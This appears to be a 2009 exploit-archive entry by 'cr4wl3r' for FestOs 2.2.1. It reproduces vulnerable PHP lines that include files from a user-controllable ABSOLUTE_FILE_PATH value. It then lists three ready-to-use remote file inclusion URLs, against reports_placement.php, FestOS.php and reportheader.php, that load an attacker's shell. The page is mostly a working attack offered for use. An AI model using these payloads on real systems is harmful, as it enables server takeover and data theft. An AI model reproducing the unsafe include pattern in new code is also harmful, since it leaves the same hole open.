[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FestOs <= 2.2.1 Multiple RFI Exploit
# Published : 2009-12-19
# Author : cr4wl3r
# Previous Title : phUploader Remote File Upload Vulnerability
# Next Title : Barracuda Web Firewall 660 Firmware v7.3.1.007 Vulnerability
##################################################################
## Exploit Title: FestOs <= 2.2.1 Multiple RFI Exploit ##
## Date: 19-12-2009 ##
## Author: cr4wl3r ##
## Software Link: http://code.google.com/p/festos/downloads/list##
## Version: N/A ##
## Tested on: GNU/LINUX ##
##################################################################
~ Code : [reports_placement.php]
<?php
$title = "Jury Sheet Report";
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
header("Location:index.php");
}
include "includes/reportheader.php";
?>
~ 3xplo!t :
[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]
~ Code : [FestOS.php]
require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");
~ 3xplo!t :
[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]
~ Code : [reportheader.php]
require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
~ 3xplo!t :
[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]
and more...